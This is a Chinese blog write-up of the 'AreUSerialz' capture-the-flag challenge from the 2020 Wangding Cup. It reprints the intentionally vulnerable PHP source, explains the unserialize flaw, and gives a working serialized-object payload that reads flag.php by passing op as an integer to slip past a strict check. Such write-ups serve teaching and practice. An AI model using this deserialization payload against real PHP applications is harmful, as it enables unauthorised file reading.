[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-01-21 11:13:41 发布

kuller_Yan

最新推荐文章于 2024-01-21 11:13:41 发布

阅读量275

点赞数 1

分类专栏： CTF题目 # buu 文章标签： php

本文链接：https://blog.youkuaiyun.com/kuller_Yan/article/details/108566123

版权

CTF题目同时被 2 个专栏收录

38 篇文章

订阅专栏

buu

25 篇文章

订阅专栏

本文介绍了网鼎杯2020青龙组的AreUSerialz挑战，主要涉及PHP代码审计，重点在于反序列化问题。通过分析GET参数、is_valid函数的ASCII限制以及read函数的文件读取，构造payload成功触发输出，从而揭示flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

[网鼎杯 2020 青龙组]AreUSerialz----Kuller_Yan

好久没写博客了，真是罪过啊！！
今天WAXZ的师傅们去打线下了，太顶了，激起学习欲望，好好学习咯。

这题PHP代码审计：反序列化问题

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

访问url就可以看到大段的php代码；

逐个函数进行分析：

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

首先这一部分：最重要的GET传值嘛，先接收$str然后用is_valid函数判断，检测通过就反序列化，直接搞一波


function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

这一段就是上面提到的is_valid判断函数，可以看到传入的值ascll码要求在32到125之间，不然就会报错

private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

读取文件函数，在我看来就是暗示filename=flag.php

 public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

如果op=2那么调用read函数读取，并且在output（）函数里面输出

private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

输出函数。

function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

如果op=2强制变为1

所以可以构建payload

<?php
class FileHandler{
	public $op=2; 	//这里不能加单引号，会报错
	public $filename = 'flag.php';
	public $content;
}
echo serialize(new FileHandler);

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

[网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz----Kuller_Yan

访问url就可以看到大段的php代码；

flag就出来了。